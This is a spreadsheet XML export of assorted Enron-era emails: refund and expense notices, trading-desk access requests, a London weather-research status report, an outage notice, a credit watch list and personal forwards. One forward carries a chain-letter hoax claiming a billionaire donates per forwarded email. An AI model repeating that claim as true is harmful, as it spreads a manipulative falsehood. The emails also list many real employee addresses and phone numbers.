We're writing to confirm that we have processed your refund for_x000D_
$18.00 for the above-referenced order._x000D_
_x000D_
This amount should appear as a credit on your next credit card statement._x000D_
For more information about this refund, please visit Your Account_x000D_
(http://www.amazon.com/your-account) to view the above-referenced order._x000D_
Completed returns and refunds will appear at the bottom of the order_x000D_
summary page._x000D_
_x000D_
We hope that this is a satisfactory resolution for you._x000D_
If you have any questions, please contact us via e-mail, fax, or_x000D_
phone:_x000D_
_x000D_
E-mail: orders@amazon.com_x000D_
Fax:    1-206-266-2950_x000D_
Phone:  1-800-201-7575 for US customers_x000D_
        1-206-266-2992 for international customers_x000D_
_x000D_
Thank you for shopping at Amazon.com._x000D_
_x000D_
-------------------------------------------------------------_x000D_
Amazon.com_x000D_
Earth's Biggest Selection_x000D_
info@amazon.com             http://www.amazon.com/_x000D_
-------------------------------------------------------------</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 22:30:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dmccarty@enron.com'})</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - November Expenses</t>
  </si>
  <si>
    <t>The Payment status has changed on the following report:_x000D_
_x000D_
Status last changed by:  System_x000D_
Expense Report Name: November Expenses_x000D_
Report Total: $980.39_x000D_
Amount Due Employee: $980.39_x000D_
Amount Approved: $980.39_x000D_
Amount Paid: $980.39_x000D_
Approval Status: Approved_x000D_
Payment Status: Paid_x000D_
_x000D_
_x000D_
To review this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Tue, 4 Apr 2000 01:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>please print - Revised NSP confirms</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Elizabeth Sager/HOU/ECT on 04/04/2000 _x000D_
08:43 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  David Portz                           04/03/2000 05:29 PM_x000D_
	_x000D_
_x000D_
To: Geoffrey Allen/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
cc: Elizabeth Sager/HOU/ECT@ECT _x000D_
Subject: Revised NSP confirms_x000D_
_x000D_
Geoff -- As discussed, attached for your review and comment are the three _x000D_
revised NSP confirmations, redlined to show changes from the March 20th _x000D_
versions forwarded to us by NSP.  Please come back to me with any questions _x000D_
or comments. -- David_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 03:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fran.chang@enron.com', 'heather.dunton@enron.com', 'samantha.law@enron.com'})</t>
  </si>
  <si>
    <t>Re: New (West) Power Trader Desk Access</t>
  </si>
  <si>
    <t xml:space="preserve">Here's the procedure for adding new traders to the system. I've requested to _x000D_
have Paul Choi's name added - Greg Wolfe and the rest of the mid-marketers _x000D_
appear to already be in there._x000D_
_x000D_
Kate_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 03/16/2001 11:54 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Samuel Schott                           03/16/2001 11:10 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: New (West) Power Trader Desk Access  _x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Hello Kate,_x000D_
_x000D_
In order for Power Traders to gain access to Power Desks, my team, _x000D_
GCP_Houston, must link their names to each Desk._x000D_
(Basically, we need a list of desks that the Traders need access.)_x000D_
_x000D_
Please provide the following info:_x000D_
_x000D_
Example(s): _x000D_
_x000D_
Add these Power Trader(s) to the following Desks: Paul Choi, Greg Wolfe_x000D_
_x000D_
CP/ID 66189 (not required, but helpful)    EPMI Short Term West Hourly_x000D_
CP/ID 56849  "    EPMI Long Term West Management_x000D_
_x000D_
Please submit your request(s) to GCP_Houston, (this is my entire team)._x000D_
_x000D_
Best Rgds._x000D_
_x000D_
Samuel _x000D_
713-853-9890_x000D_
(GCP_Enron Networks)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes                03/16/2001 12:36 PM_x000D_
_x000D_
To: Samuel Schott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New Trader IDs_x000D_
_x000D_
The Portland West Desk needs two new traders added to EnPower. I believe _x000D_
you're the correct person to contact for this, but please let me know if I _x000D_
should talk to somebody else. We'd like to have our mid-marketers enter their _x000D_
own trades now, and many of them already have the IDs to do that. Two _x000D_
marketers - Paul Choi and Greg Wolfe - do not. I know that when I took over _x000D_
the Deal Control position here John Forney contacted you to help me acquire a _x000D_
trader ID, so I'm hoping you can help me with this task._x000D_
_x000D_
Thank you,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Sep 1997 06:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dan Allegretti's CT restructuring school in Houston -</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
You are invited to join them for lunch._x000D_
1:00 - 2:00</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>London Status Report - Research Weather Effort</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
FYI to give you background for tomorrow's telephone conference_x000D_
_x000D_
Steve is really a home-run hitter_x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike A Roberts/HOU/ECT on 04/12/2001 _x000D_
09:26 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Stephen Bennett @ ENRON                           04/12/2001 09:02 AM_x000D_
	_x000D_
_x000D_
To: Mike A Roberts/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: London Status Report_x000D_
_x000D_
Hi Mike,_x000D_
_x000D_
Before we meet with Vince tomorrow - I thought we should drop you a line and _x000D_
give you an idea as to what's been accomplished in the first week as well as _x000D_
some of the challenges and problems we've run into.  This way we can make the _x000D_
most effective use of Vince's time._x000D_
_x000D_
1) Current Products and Customers_x000D_
_x000D_
In our first 3 days - we established 6 different customer groups - _x000D_
representing approximately 40 traders plus additional fundamentals and _x000D_
analytics folks.  The groups are:  UK Trading, Gas Fundamentals, Crude _x000D_
Trading, Weather Derivatives, Continental Power, and an internal trader _x000D_
newsletter._x000D_
_x000D_
We've built the following framework to address these customers - the key _x000D_
deadlines are noted:_x000D_
_x000D_
0800: UK Trading/Weather Derivatives/Fundamentals: Prepare a 1 to 5 day UK _x000D_
specific forecast and assess the 12z runs of the ECMWF (and ensembles), the _x000D_
AVN as well as EarthSat's 1-5 day outlook.  The traders are particularly _x000D_
interested in the performance of the ECMWF as it feeds all of their demand _x000D_
models.  We prepare a 1 page summary and give an idea as to any particular _x000D_
forecast biases - whether we feel things may come in warmer or colder than _x000D_
the model.  We brief the traders and field questions then provide our report _x000D_
to the fundamentals group.  _x000D_
** In the future we would like to be able to gather raw data from the AVN and _x000D_
MRF to provide a series of choices which could be input into their demand _x000D_
models or at least be able to give them our "best pick" of guidance and how _x000D_
we feel things may deviate from that pick._x000D_
_x000D_
1030AM:  Obtain the UK Met 6-10 and 1-5 day forecasts.  Provide comment for _x000D_
UK Trading._x000D_
_x000D_
1200:  UK Trading/Crude and Products/Weather Derivatives:  Prepare a full _x000D_
qualitative analysis of 0z models (MRF/NOGAPS/CANADIAN/Ensembles).  Produce a _x000D_
6 to 10 day Europe forecast and make any needed adjustments to the 1 to 5 day _x000D_
forecast.  Produce the Global Weather Report including a Global Executive _x000D_
Summary; Analysis of Teleconnections and their expected impact; 1 to 5 and 6 _x000D_
to 10 day forecasts compared to EarthSat; A 10 day city forecast table for _x000D_
European Cities along with the expected effect on heating demand and finally _x000D_
A "port status report" describing weather and port conditions in 11 worldwide _x000D_
ports.  Update traders (UK and Wx Deriv) on changes or new trends in the 0z _x000D_
models.  Provide a quality assessment of the UK Met 6 to 10 and 1 to 5 day _x000D_
forecast for UK Trading.  _x000D_
_x000D_
1330 (Mon-Wed):  Brief the Crude and Products groups in London and Houston._x000D_
_x000D_
1600:  Review 12z AVN for any major forecast changes and communicate changes _x000D_
to traders._x000D_
_x000D_
Weekly:  Produce a weather article for "Critical Mass" - internal trading _x000D_
newsletter._x000D_
_x000D_
Of course between 1000 and 1330 we are looking closely at the US weather for _x000D_
support to you guys in Houston.  I'm still writing the daily US Executive _x000D_
summary as well as producing a 6 to 10 day US forecast._x000D_
_x000D_
2) Requested Projects:_x000D_
_x000D_
* Gas Fundamentals has asked us to provide weather information for their _x000D_
morning report and website.  They would like to be able to gather objective _x000D_
output from as many forecast models as we can get._x000D_
* Weather Derivatives has asked for week ahead, month ahead, and seasonal _x000D_
outlooks for temperature and precipitation.  They have also asked about _x000D_
creating a tradeable "NAO Index" and developing an in-house model for _x000D_
forecasting NAO._x000D_
* Continental Power has asked for temperature and precipitation outlooks for _x000D_
power generation and hydro._x000D_
* Gas Fundamentals, UK Trading, Continental Power, Weather Derivatives and _x000D_
Crude and Products have all asked for a European Summer Outlook for _x000D_
temperature and precipitation.  We expect to have this completed tomorrow._x000D_
* The research group has asked for assistance in gathering climate data _x000D_
across Spain for temperature and precipitation._x000D_
_x000D_
3) Leads to Follow Up On:_x000D_
_x000D_
* Elsa in Houston asked us to contact some of the Softs traders here and let _x000D_
them know once we were up and running._x000D_
* Contact Chris Mahoney to determine if we can provide and additional support _x000D_
for Crude and Products._x000D_
* Follow up on a potential morning breifing for Continental Power_x000D_
_x000D_
4) Challenges:_x000D_
_x000D_
* We've been told that we will be moving locations next week - which might _x000D_
entail corrupting or loosing the software and hardware configurations that _x000D_
have taken almost a week to get fully established.  It seems that this office _x000D_
functions on a "hot desk" system where people are constantly moving around.  _x000D_
This will make it very difficult to stay connected - as well as very _x000D_
difficult for our customers to identify us._x000D_
* Administrative detail take an inordinate amount of time.  Assembling _x000D_
reports both physical and electronic can take nearly as long as actually _x000D_
preparing the reports!_x000D_
_x000D_
---_x000D_
Mike,_x000D_
 _x000D_
OK - I think that brings you up to speed.  I've been amazed at the amount of _x000D_
feedback we've already gotten and we've only been here 3 days!  On that note _x000D_
I wanted to let you know that I am fully committed to this project.  It seems _x000D_
that we will not have a second meteorologist to assist Tony by my planned _x000D_
departure date on the 20th.  As such - I can continue in my current role _x000D_
through my planned vacation - keeping me in London until the 27th - which is _x000D_
my current reservation back to Houston.  I am also open to remaining in _x000D_
London beyond the 27th to ensure the success of this project._x000D_
_x000D_
Hopefully this gives you a good idea as to what's gone on in the first few _x000D_
days here.  We look forward to talking to you later today and with you and _x000D_
Vince tomorrow._x000D_
_x000D_
  _x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 04:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'jeffrey.keeler@enron.com', 'laura.lantefield@enron.com', 'robert.neustaedter@enron.com', 'james.studebaker@enron.com', 'susan.scott@enron.com', 'jane.wilson@enron.com', 'michael.moran@enron.com', 'debbie.thompson@enron.com', 'donna.scott@enron.com', 'dorothy.mccoppin@enron.com', 'peggy.phillips@enron.com', 'jody.warner@enron.com', 'lisa.sawyer@enron.com', 'jim.talcott@enron.com', 'michele.winckowski@enron.com', 'michael.norden@enron.com', 'frazier.king@enron.com', 'zelda.paschal@enron.com', 'lou.geiler@enron.com', 'tim.kissner@enron.com', 'robert.kilmer@enron.com', 'cynthia.sandherr@enron.com', 'robert.hill@enron.com', 'phil.lowry@enron.com', 'lorna.brennan@enron.com', 'larry.deroin@enron.com', 'mary.miller@enron.com', 'eric.benson@enron.com', 'james.saunders@enron.com', 'julia.white@enron.com', 'louis.soldano@enron.com', 'susan.mara@enron.com', 'amber.white@enron.com', 'rockford.meyer@enron.com', 'martha.janousek@enron.com', 'staci.holtzman@enron.com', 'teb.lokey@enron.com', 'denis.tu@enron.com', 'shelley.corman@enron.com', 'sheila.nacey@enron.com', 'kimberly.watson@enron.com', 'elizabeth.linnell@enron.com', 'jack.boatman@enron.com', 'jenny.rub@enron.com', 'donna.bily@enron.com', 'john.goodpasture@enron.com', 'ray.neppl@enron.com', 'donna.martens@enron.com', 'geneva.patterson@enron.com', 'janet.place@enron.com', 'martha.benner@enron.com', 'sharon.farrell@enron.com', 'robert.hayes@enron.com', 'sarah.novosel@enron.com', 'stephen.veatch@enron.com', 'rob.bradley@enron.com', 'rick.dietz@enron.com', 'kim.wilkie@enron.com', 'lon.stanton@enron.com', 'dave.schafer@enron.com', 'mike.smith@enron.com', 'nancy.bagot@enron.com', 'edith.terry@enron.com', 'eileen.peebles@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'rod.hayslett@enron.com', 'daniel.allegretti@enron.com', 'kathy.ringblom@enron.com', 'christi.nicolay@enron.com', 'theresa.branney@enron.com', 'tamara.hopkins@enron.com', 'donald.vignaroli@enron.com', 'john.dushinske@enron.com', 'steve.kirk@enron.com', 'christi.culwell@enron.com', 'donna.fulton@enron.com', 'mike.mcgowan@enron.com', 'john.ballentine@enron.com', 'mary.hain@enron.com', 'stanley.horton@enron.com', 'keith.petersen@enron.com', 'maureen.palmer@enron.com', 'colleen.raker@enron.com', 'drew.fossum@enron.com', 'richard.shapiro@enron.com', 'theresa.hess@enron.com', 'steven.kean@enron.com', 'lee.huber@enron.com', 'blair.lichtenwalter@enron.com', 'linda.lawrence@enron.com', 'maria.pavlou@enron.com', 'bob.chandler@enron.com', 'mary.darveaux@enron.com', 'ranelle.paladino@enron.com', 'steven.january@enron.com', 'lynn.blair@enron.com', 'bambi.heckerman@enron.com', 'bret.fritch@enron.com', 'dari.dornan@enron.com', 'james.steffes@enron.com', 'tony.pryor@enron.com', 'joe.hartsoe@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Government Affairs Report</t>
  </si>
  <si>
    <t>Attached is the Weekly Report for week ending November 10._x000D_
_x000D_
_x000D_
_x000D_
On Monday, I will release this same report with all associated orders _x000D_
linked.  As of next week, our Weekly Government Affairs (Gas) Reports will be _x000D_
accessible only on our ETS website.  Many prior reports are already archived _x000D_
for your convenience.</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fwd: FW: Fw: Is there a theme?</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Dorland/CAL/ECT on 01/04/2000 01:26 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael McDermott" &lt;mjmcdermott@hotmail.com&gt; on 01/04/2000 10:12:20 AM_x000D_
To: Chris Dorland/CAL/ECT@ECT, robasaurusrex@hotmail.com, _x000D_
lrmassiah@hotmail.com, bhmoody@hotmail.com_x000D_
cc:  _x000D_
Subject: Fwd: FW: Fw: Is there a theme?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----Original Message Follows----_x000D_
From: Blaine Williamson &lt;bwilliamson@oebi.com&gt;_x000D_
To: "'mjmcdermott@hotmail.com'" &lt;mjmcdermott@hotmail.com&gt;_x000D_
Subject: FW: Fw: Is there a theme?_x000D_
Date: Tue, 4 Jan 2000 09:33:03 -0700_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: mike.weninger@weatherford.com_x000D_
[mailto:mike.weninger@weatherford.com]_x000D_
Sent: Wednesday, December 29, 1999 11:35 AM_x000D_
To: bwilliamson@oebi.com_x000D_
Subject: FW: Fw: Is there a theme?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Rodney Lutz [mailto:rdltzaec@telusplanet.net]_x000D_
Sent: December 22, 1999 11:16 PM_x000D_
To: Chiplake_x000D_
Subject: Fw: Fw: Is there a theme?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
 - nothing to wear.jpg_x000D_
 - not worthy.jpg_x000D_
 - no no.jpg_x000D_
 - pet my puppy.jpg_x000D_
 - swallow.jpg_x000D_
 - twice a day.jpg_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jan 2000 02:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.soto@enron.com', 'amber.limas@enron.com', 'angela.barnett@enron.com', 'leslie.smith@enron.com', 'michelle.neville@enron.com', 'rose.botello@enron.com', 'maria.sandoval@enron.com'})</t>
  </si>
  <si>
    <t>Fw: If u delete this...u seriously don't have a heart!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 01/06/2000 _x000D_
10:25 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Maria Sandoval                           01/06/2000 08:24 AM_x000D_
	_x000D_
_x000D_
To: Margo Reyna/HOU/EES@EES, Andrea R Guillen/HOU/ECT@ECT, Phenicia _x000D_
Olivier/HOU/ECT@ECT, Bernice Rodriguez/HOU/ECT@ECT, Melissa _x000D_
Rodriguez/HOU/ECT@ECT, Pamela Sonnier/HOU/ECT@ECT, Cassandra S _x000D_
Dutton/HOU/ECT@ECT, Cecilia Olvera/HOU/ECT@ECT, Lorraine Becker/HOU/ECT@ECT, _x000D_
Irena D Hogan/HOU/ECT@ECT, Angela Henn/HOU/ECT@ECT, Melba Lozano/HOU/ECT@ECT, _x000D_
Chantelle Villanueva/HOU/ECT@ECT, yolanda.sandoval@mwk.com, _x000D_
patty.soria@mwk.com, mcastillo@metromkt.com, elizabeth.gutierrez@eott.com, _x000D_
Judy Hernandez/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, amolina@unifirst.com, _x000D_
apena26@hotmail.com_x000D_
cc:  _x000D_
Subject: Fw: If u delete this...u seriously don't have a heart!_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Maria Sandoval/HOU/ECT on 01/06/2000 _x000D_
08:24 AM ---------------------------_x000D_
_x000D_
_x000D_
Chantelle Villanueva_x000D_
01/06/2000 08:17 AM_x000D_
To: Brenda Flores-Cuellar/HOU/ECT@ECT, Melissa Jones/Enron _x000D_
Communications@Enron Communications, Heather Choate/HOU/ECT, Alex _x000D_
Saldana/HOU/ECT@ECT, Cecilia Olvera/HOU/ECT@ECT, Maria Sandoval/HOU/ECT@ECT, _x000D_
Irena D Hogan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fw: If u delete this...u seriously don't have a heart!_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chantelle Villanueva/HOU/ECT on _x000D_
01/06/2000 08:16 AM ---------------------------_x000D_
_x000D_
_x000D_
Brenda Flores-Cuellar_x000D_
01/06/2000 08:10 AM_x000D_
To: Vanessa Cruz &lt;VCruz@AUANET.ORG&gt;, Yolanda Ford/HOU/ECT, Gerard197@aol.com, _x000D_
javery3@enron.com, Melissa Jones/Enron Communications@ENRON _x000D_
COMMUNICATIONS@ENRON, mmartinez@eesinc.com, ryanm@huddlestonco.com, _x000D_
MDRODR@aol.com, Susan D Trevino/HOU/ECT, Chantelle Villanueva/HOU/ECT, _x000D_
Michelle Vitrella/HOU/ECT, "Comello, Mary" &lt;Mary.Comello@natoil.com&gt;, _x000D_
"Padron, Myriam" &lt;myriam.padron@et.pge.com&gt;, "Beatrice Reyna" _x000D_
&lt;beatricereyna@hotmail.com&gt;, Del Martinez _x000D_
&lt;dmartinz@staff.austin.isd.tenet.edu&gt;, "Lilia Campos" _x000D_
&lt;liliacampos@tealcon.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: If u delete this...u seriously don't have a heart!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; Subj:   Fwd: Fw: If u delete this...u seriously don't have a heart!_x000D_
&gt;_x000D_
&gt;  &gt;Date: Sat, 4 Dec 1999 12:49:34 -0800_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;   Dear Friends,_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;       My name is Anna Cohen and I  live in Albany New York.  My_x000D_
daughter_x000D_
&gt;  &gt;Liz recently had a baby girl named Jada.  2 months early.  Jada has many_x000D_
&gt;  &gt;problems with her heart and lungs and medical costs have become_x000D_
extremely_x000D_
&gt;  &gt;expensive. Jada was recently moved to a hosptial in california and the_x000D_
&gt;  &gt;move was very expensive. A billionaire in california has promised to_x000D_
give_x000D_
&gt;  &gt;$.05 for every  time this email is forwarded.  If you wouldn't mind_x000D_
&gt;  &gt;forwarding_x000D_
&gt;  &gt;this to everyone on your  list I would greatly appreciate it as well as_x000D_
&gt;  &gt;my  daughter and little  Jada.  This could save a life.  Please have a_x000D_
&gt;  &gt;heart and forward this._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;                                 Remember:  What goes around comes_x000D_
around._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;          Thank you,_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;                                  Anna Cohen_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;    p.s. Please Forward to everyone on your list!!!_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 11:55:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maintenance.dl-exchange@enron.com'})</t>
  </si>
  <si>
    <t>NOTIFICATION:  Outlook Outage - Friday, December 28, 2001</t>
  </si>
  <si>
    <t>_x000D_
This is a notice to inform you that the server where your Outlook mailbox resides is scheduled for an outage tonight.  Your mailbox will be temporarily unavailable starting anytime after 8pm and may continue to be unavailable until 12 a.m., when all server maintenance work have been completed.  Outlook Web Access (OWA) will also be unavailable during this time.  _x000D_
_x000D_
Blackberry users:  Message delivery may be delayed for a few minutes._x000D_
 _x000D_
If you have any questions, please call the Resolution Center at x31411.</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:22:32 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Story Discussion Enron Portals 10-29</t>
  </si>
  <si>
    <t>If it's fine with you , it's fine with me._x000D_
_x000D_
-----Original Message-----_x000D_
From: Nord, Sue _x000D_
Sent: Monday, October 29, 2001 10:08 AM_x000D_
To: Shapiro, Richard_x000D_
Subject: FW: Story Discussion Enron Portals 10-29_x000D_
_x000D_
_x000D_
_x000D_
Comments?  (These look fine to me)._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kelley Kenyan [mailto:KKenyan@intellibridge.com]_x000D_
Sent: Monday, October 29, 2001 10:14 AM_x000D_
To: Nord, Sue; Vegas, Dennis_x000D_
Subject: Story Discussion Enron Portals 10-29_x000D_
_x000D_
_x000D_
For your review please._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
 &lt;&lt;Enron Forum Portal Story Discussion 102901.doc&gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
Kelley R. Kenyan_x000D_
Senior Vice President, Corporate Programs_x000D_
Intellibridge Corporation_x000D_
3307 M. St. NW, Suite 200_x000D_
Washington, DC 20007_x000D_
Tel:  202 298 6300 x256_x000D_
Fax: 202 298 6276</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 07:54:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'y..resendez@enron.com', 'judy.townsend@enron.com', 'souad.mahmassani@enron.com', 'genia.fitzgerald@enron.com', 'r..conner@enron.com', 'jay.reitmeyer@enron.com', 'brad.coleman@enron.com', 'loftus.fitzwater@enron.com', 'dutch.quigley@enron.com', 'judy.thorne@enron.com', 'richard.deming@enron.com', 'k..allen@enron.com', 'dan.mccairns@enron.com', 'steven.curlee@enron.com', 'steve.van@enron.com', 'j..ewing@enron.com', 'ron.green@enron.com', 'joanne.harris@enron.com', 'scott.hendrickson@enron.com', 'a..price@enron.com', 'shonnie.daniel@enron.com', 'tom.moran@enron.com', 'bryce.baxter@enron.com', 'angelo.miroballi@enron.com', 'lee.jackson@enron.com', 'monique.sanchez@enron.com', 'jay.knoblauh@enron.com', 'rebecca.phillips@enron.com', 'greg.brazaitis@enron.com', 'denver.plachy@enron.com', 'gerald.nemec@enron.com', 'joe.hunter@enron.com', 'ina.rangel@enron.com', 'sara.shackleton@enron.com', 'vladi.pimenov@enron.com', 'j..farmer@enron.com', 'christina.bangle@enron.com', 'j..sturm@enron.com', 'matthew.lenhart@enron.com', 'jabari.martin@enron.com', 'a..shankman@enron.com', "zarin'.'imam@enron.com", 'kelli.little@enron.com', 'kevin.ruscitti@enron.com', 'k..ratnala@enron.com', 't..lucci@enron.com', 'mary.ogden@enron.com', 'm..tholt@enron.com', 'f..brawner@enron.com', 'lester.rawson@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'tiffany.smith@enron.com', 'lucy.ortiz@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'w..pereira@enron.com', 'nelson.ferries@enron.com', 'geoff.storey@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'p..south@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', "cindy'.'vachuska@enron.com", 'yuan.tian@enron.com', 'michael.etringer@enron.com', 'scott.goodell@enron.com', 's..theriot@enron.com', 'jennifer.jennings@enron.com', 'andrea.ring@enron.com', 'h..lewis@enron.com', 'b..fleming@enron.com', 'john.griffith@enron.com', 'eric.boyt@enron.com', 'craig.breslau@enron.com', 'lisa.valderrama@enron.com', 'l..hernandez@enron.com', 'mike.grigsby@enron.com', 'gregory.schockling@enron.com', 's..pollan@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'f..keavey@enron.com', 'r..brackett@enron.com', 'jeff.stephens@enron.com', 'clinton.anderson@enron.com', 'william.stuart@enron.com', 's..bradford@enron.com', 'david.parquet@enron.com', 'j..miller@enron.com', 'jennifer.fraser@enron.com', 'derek.bailey@enron.com', 'lisa.gillette@enron.com', 'raiford.smith@enron.com', 'eric.bass@enron.com', 'john.arnold@enron.com', 'jake.thomas@enron.com', 'patrick.hanse@enron.com', "tim'.'weithman@enron.com", 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'a..allen@enron.com', 'h..otto@enron.com', 'santiago.garcia@enron.com', 'randy.otto@enron.com', 'keith.holst@enron.com', 'paul.tate@enron.com', 'bernard.dahanayake@enron.com', 'daniel.quezada@enron.com', 'bryan.hull@enron.com', 'george.huan@enron.com', 'steve.neal@enron.com', 'eric.moon@enron.com', 'beth.perlman@enron.com', 'c..aucoin@enron.com', 'kevin.bosse@enron.com', 'd..sorenson@enron.com', 'janelle.scheuer@enron.com', 'john.singer@enron.com', 'dana.smith@enron.com', 'b..boxx@enron.com', 'alex.hernandez@enron.com', 'r..lilly@enron.com', 'maria.garza@enron.com', 'joni.fisher@enron.com', 'a..martin@enron.com', 'sherry.pendegraft@enron.com', 's..shively@enron.com', 'sheetal.patel@enron.com', 'l..mims@enron.com', 'd..baughman@enron.com', 'diane.anderson@enron.com', 'r..barker@enron.com', 'nathan.hlavaty@enron.com', 'mark.breese@enron.com', 'chris.lambie@enron.com', 'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'ed.mcmichael@enron.com', 'tracy.ngo@enron.com', 'shauywn.smith@enron.com', 'meredith.eggleston@enron.com', 'daniel.reck@enron.com', 'n..gilbert@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'candy.bywaters@enron.com', 'mike.maggi@enron.com', 'vladimir.gorny@enron.com', 'jonathan.horne@enron.com', 'gregg.penman@enron.com', 'sheila.glover@enron.com', 't..hodge@enron.com', 'lisa.lees@enron.com', 's..bryan@enron.com', 's..olinger@enron.com', 'stephanie.sever@enron.com', 'm.hall@enron.com', 'darren.espey@enron.com', 'dennis.benevides@enron.com', 'w..eubanks@enron.com', 'fred.lagrasta@enron.com', 'l..kelly@enron.com', 'craig.taylor@enron.com', 'larry.may@enron.com', 'john.grass@enron.com', 'n..gray@enron.com', 'louis.dicarlo@enron.com', 'tom.donohoe@enron.com', 'jungsuk.suh@enron.com', 'carol.st.@enron.com', 'l..gay@enron.com', 'cyndie.balfour-flanagan@enron.com', 'chris.germany@enron.com', 'cynthia.franklin@enron.com', 'ragan.bond@enron.com', 'tana.jones@enron.com', 'jim.willis@enron.com', 'john.lavorato@enron.com', 'stacey.richardson@enron.com', 'j..hanson@enron.com', 'dayem.khandker@enron.com', 'maureen.smith@enron.com', 'trading &lt;.williams@enron.com&gt;', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'bob.bowen@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--Week of 10/1/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised Credit Watch listing for the week of 10/01/01.   Please note that Nevada Power Company, Sierra Pacific Power Company and Upstream Energy Services Company, LLC were all placed on Credit Watch this week for "CALL CREDIT".  Granite City Steel, a division of National Steel was placed on "NO TRADES"._x000D_
If there are any personnel in your group that were not included in this distribution, please insure that they receive a copy of this report._x000D_
To add additional people to this distribution, or if this report has been sent to you in error, please contact Veronica Espinoza at x6-6002._x000D_
For other questions, please contact Jason R. Williams at x5-3923,  Veronica Espinoza at x6-6002 or Darren Vanek at x3-1436._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 14:09:37 -0800 (PST)</t>
  </si>
  <si>
